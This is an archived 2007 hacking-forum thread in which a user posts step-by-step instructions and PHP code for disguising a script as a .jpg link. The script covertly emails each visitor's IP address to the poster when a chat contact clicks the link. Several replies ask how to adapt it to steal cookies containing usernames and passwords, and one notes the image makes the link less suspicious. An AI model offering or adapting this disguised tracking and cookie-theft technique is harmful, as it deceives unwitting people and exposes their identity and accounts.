About
Community
Bad Ideas
Drugs
Ego
Erotica
Fringe
Society
Technology
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it
Go Back   Community > Technology > Network Security and Hacking
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Network Security and Hacking Interesting hacks and cracks. Info on firewalls, TCP/IP, encryption, networks, and security. The ins and outs of the phone system, caller services, how things work, what's illegal and what's not, cellular phones, beepers, telephony legislation, the PUC, ISDN, taps, who's listening, and switches. Talking about phones, hacking systems, technical advice, and such iscompletely LEGAL in the United States -- it's covered by the First Ammendment. What's illegal is conspiracy to commit a crime. So if you say something like "Meet me at 2am so we can crack a can" or "I changed my cellphone's number myself" you are criminally liable. Stating "You can crack a can by doing thus-and-so" or "If you wanted to change a cellphone's number, you could do it like so" is perfectly ok. Posting passwords, calling card numbers, or credit card numbers is forbidden on this network. Posting such info will get you booted off the net.

Reply
 
Thread Tools Display Modes
  #1   Add Gazz to your ignore list  
Old 2007-04-26, 19:48
Gazz Gazz is offline
Regular
 
Sheffield Town Send a message via AIM to Gazz Send a message via MSN to Gazz Send a message via Yahoo to Gazz Gazz is an unknown
Default Hiding PHP in an Image

1. Get a webhost that supports PHP and make a new folder called /nameofyourimage.jpg/ Yes, it’ll work, you can make folders containing dots.

2. In this folder, create a file called index.php (using notepad > save as or using your favorite web editor).

3. Open the file in you editor and copy-paste the following code:

Code:
<?PHP

$remote_addr = getenv(’REMOTE_ADDR’);

$toaddress = “your@mail.com” // enter your e-mail address here!

$subject = “IP tracket” // This will be subject of the e-mail

$message = ” IP: $remote_addr ” // The message in the mail

$fromname = “profit42.com” // The name of the sender

$fromaddress = “bot@me.com” // The sender’s e-mail

$headers = “MIME-Version: 1.0\n”

$headers .= “Content-type: text/plain; charset=iso-8859-1\n”

$headers .= “X-Priority: 3\n”

$headers .= “X-MSMail-Priority: Normal\n”

$headers .= “X-Mailer: php\n”

$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”

mail($toaddress, $subject, $message, $headers);

?>

<img src=”nameofyourimage.jpg”>
4. Save and upload the file. Also upload nameofyourimage.jpg to the folder. If you visit the page, you’ll see something like this: http://www.profit42.com/test.jpg

5. Then give someone in your MSN list the link (webhost.com/nameofyourimage.jpg). If he clicks it his/her IP will be mailed to you! Imagine the possibilities…

That’s about everything. With this simple trick you can hide Code in an image. Replace the PHP code with something else, add JavaScript or whatever: use your imagination!
Reply With Quote
  #2   Add Mutant Funk Drink to your ignore list  
Old 2007-04-27, 21:23
Mutant Funk Drink Mutant Funk Drink is offline
Regular
 
California Mutant Funk Drink is an unknown
Thumbs up Re: Hiding PHP in an Image

Is there a way to make that script email cookies containing usernames and passwords from your victim's computer?

By the way, cool script! +1
Reply With Quote
  #3   Add dfgremnantsunleashed to your ignore list  
Old 2007-04-27, 21:42
dfgremnantsunleashed dfgremnantsunleashed is online now
Regular
 
a.K.a Dfg Send a message via MSN to dfgremnantsunleashed Send a message via Yahoo to dfgremnantsunleashed dfgremnantsunleashed is an unknown
Thumbs down Re: Hiding PHP in an Image

Okay here is the original post!
http://www.profit42.com/index.php/20...ore-in-images/
or
Tiny!
http://preview.tinyurl.com/2ysusj

next time at least quote the original author.
Reply With Quote
  #4   Add Gazz to your ignore list  
Old 2007-04-27, 21:58
Gazz Gazz is offline
Regular
 
Sheffield Town Send a message via AIM to Gazz Send a message via MSN to Gazz Send a message via Yahoo to Gazz Gazz is an unknown
Default Re: Hiding PHP in an Image

Quote:
Originally Posted by dfgremnantsunleashed View Post
Okay here is the original post!
http://www.profit42.com/index.php/20...ore-in-images/
or
Tiny!
http://preview.tinyurl.com/2ysusj

next time at least quote the original author.
If I had knew the author I would, It's been posted a stupid amount of times all over the internet. Apologies to the author.
Reply With Quote
  #5   Add cense to your ignore list  
Old 2007-04-27, 22:00
cense cense is offline
Moderator
 
cense is worth listening to cense is worth listening to cense is worth listening to cense is worth listening to
Default Re: Hiding PHP in an Image

Hold on a second...

This is cool and all, but if people are stupid enough to click links blindly, there are a bajillions ways you can get their IP without any scripting.

Cool idea, but the example you gave is more or less pointless.
__________________
evil, corruption and bad taste!
Reply With Quote
  #6   Add Gazz to your ignore list  
Old 2007-04-27, 23:32
Gazz Gazz is offline
Regular
 
Sheffield Town Send a message via AIM to Gazz Send a message via MSN to Gazz Send a message via Yahoo to Gazz Gazz is an unknown
Default Re: Hiding PHP in an Image

Quote:
Originally Posted by cense View Post
Hold on a second...

This is cool and all, but if people are stupid enough to click links blindly, there are a bajillions ways you can get their IP without any scripting.

Cool idea, but the example you gave is more or less pointless.
It's pretty much a n00bs guide to getting a persons IP easily.

I disagree it's not pointless, it's handy for some people, if your going to say my topic is pointless you should take a look at some of the topics in this forum that are pretty much tech questions.
Reply With Quote
  #7   Add cense to your ignore list  
Old 2007-04-28, 00:36
cense cense is offline
Moderator
 
cense is worth listening to cense is worth listening to cense is worth listening to cense is worth listening to
Default Re: Hiding PHP in an Image

Well, I guess you're right.

It's not pointless because it emails the IP but you could just as easily link to a real image and just check the damn web server logs.
__________________
evil, corruption and bad taste!
Reply With Quote
  #8   Add lesserlightsofheaven to your ignore list  
Old 2007-04-28, 01:19
lesserlightsofheaven lesserlightsofheaven is offline
Regular
 
Suburban Buffalo New York. Send a message via AIM to lesserlightsofheaven lesserlightsofheaven is an unknown
Smile Re: Hiding PHP in an Image

so could this also potentially be used to steal cookies, since you can basically put any php you want in there?

and also, is it really necessary to have the image in there, I don't quite follow that part. couldn't you just have the blank page there without an image with the same code and the same effect?
Reply With Quote
  #9   Add Mutant Funk Drink to your ignore list  
Old 2007-04-28, 04:40
Mutant Funk Drink Mutant Funk Drink is offline
Regular
 
California Mutant Funk Drink is an unknown
Default Re: Hiding PHP in an Image

Quote:
Originally Posted by lesserlightsofheaven View Post
so could this also potentially be used to steal cookies, since you can basically put any php you want in there?

and also, is it really necessary to have the image in there, I don't quite follow that part. couldn't you just have the blank page there without an image with the same code and the same effect?
An image just gives you an excuse to give the person the link and to make it less suspicious. Though the average person wouldn't be smart enough to figure it out anyway.
Reply With Quote
  #10   Add oddballz194 to your ignore list  
Old 2007-04-28, 23:10
oddballz194 oddballz194 is offline
Regular
 
oddballz194 is an unknown
Default Re: Hiding PHP in an Image

Quote:
Originally Posted by cense View Post
Well, I guess you're right.

It's not pointless because it emails the IP but you could just as easily link to a real image and just check the damn web server logs.
Unless you don't control the web server... Then it's kinda hard to check the logs.

Also, you could make the fake jpeg image script do other things besides just email the link to you...
Reply With Quote
This thread continued for 2 pages in the real archive, 13 posts total - only page 1 survived here.
Reply


Thread Tools
Show Printable Version Show Printable Version
Email this Page Email this Page
Display Modes
Linear Mode Linear Mode
Hybrid Mode Switch to Hybrid Mode
Threaded Mode Switch to Threaded Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump

 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
 

totse.com certificate signatures
 
 
About | Community | Bad Ideas | Drugs | Ego | Erotica | Fringe | Society | Technology
Hot Topics